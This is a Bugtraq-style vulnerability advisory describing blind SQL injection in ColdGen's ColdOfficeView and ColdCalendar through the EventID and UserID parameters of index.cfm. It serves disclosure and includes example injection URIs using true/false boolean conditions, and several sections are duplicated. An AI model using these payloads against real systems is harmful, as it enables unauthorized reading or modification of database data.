Multiple ColdGen Products 'index.cfm' Multiple SQL Injection Vulnerabilities
BID:43035
Info
Multiple ColdGen Products 'index.cfm' Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 43035 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 07 2010 12:00AM |
| Updated: | Sep 07 2010 12:00AM |
| Credit: | mr_me |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
Multiple ColdGen Products 'index.cfm' Multiple SQL Injection Vulnerabilities
Multiple ColdGen products are prone to multiple SQL-injection vulnerabilities because they fail to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ColdOfficeView 2.04 and ColdCalendar 2.06 are vulnerable; other versions may also be affected.
Multiple ColdGen products are prone to multiple SQL-injection vulnerabilities because they fail to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ColdOfficeView 2.04 and ColdCalendar 2.06 are vulnerable; other versions may also be affected.
Exploit / POC
Multiple ColdGen Products 'index.cfm' Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following exploit code and example URIs are available:
http://www.example.com/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=[Blind SQLi]
http://www.example.com/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=1 and 1=1 << true
http://www.example.com/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=1 and 1=2 << false
http://www.example.com/[path]/index.cfm?fuseaction=EditProfile&UserID=[Blind SQLi]
http://www.example.com/[path]/index.cfm?fuseaction=EditProfile&UserID=1 and 1=1 << true
http://www.example.com/[path]/index.cfm?fuseaction=EditProfile&UserID=1 and 1=2 << false
Attackers can use a browser to exploit these issues.
The following exploit code and example URIs are available:
http://www.example.com/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=[Blind SQLi]
http://www.example.com/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=1 and 1=1 << true
http://www.example.com/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=1 and 1=2 << false
http://www.example.com/[path]/index.cfm?fuseaction=EditProfile&UserID=[Blind SQLi]
http://www.example.com/[path]/index.cfm?fuseaction=EditProfile&UserID=1 and 1=1 << true
http://www.example.com/[path]/index.cfm?fuseaction=EditProfile&UserID=1 and 1=2 << false
Solution / Fix
Multiple ColdGen Products 'index.cfm' Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Multiple ColdGen Products 'index.cfm' Multiple SQL Injection Vulnerabilities
References:
References:
- ColdCalendar Product Page (ColdGen)
- ColdOfficeView Product Page (ColdGen)